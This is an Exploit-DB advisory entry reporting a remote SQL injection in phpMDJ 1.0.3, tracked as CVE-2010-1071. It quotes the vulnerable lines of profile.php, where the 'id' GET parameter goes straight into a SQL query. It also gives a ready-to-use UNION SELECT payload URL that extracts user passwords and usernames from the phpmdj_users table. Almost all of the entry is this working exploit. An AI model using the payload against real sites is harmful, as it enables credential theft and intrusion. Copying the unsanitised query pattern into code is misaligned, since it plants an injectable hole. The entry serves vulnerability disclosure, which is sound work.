phpMDJ 1.0.3 - SQL Injection Vulnerability

2010-01-10T00:00:00
ID EDB-ID:11083
Type exploitdb
Reporter k4cp3r and Ablus
Modified 2010-01-10T00:00:00

Description

phpMDJ 1.0.3 SQL Injection Vulnerability. CVE-2010-1071. Webapps exploit for php platform

                                        
                                            ,--------------------------------------------------------------,
> Vulnerable Script : phpMDJ 1.0.3                             \
> Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip  \
> Vulnerability : Remote Sql Injection                         \
'--------------------------------------------------------------'

,-------------------------------------------------------------------------------------------------------------------------------------,
> Profile.php															      \
> Line 14 : $membre = $_GET['id'];												      \
> Line 15 :															      \
> Line 16 : $sql = "SELECT a.nom AS nGroupe, u.* FROM phpmdj_users u, phpmdj_auth a WHERE u.groupe = a.id_groupe AND u.id = $membre"; \
>																      \
> Injection:															      \
> http://site/path/profile.php?id=[SQL]												      \
>																      \
> Example:															      \
> http://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--	      \
'-------------------------------------------------------------------------------------------------------------------------------------'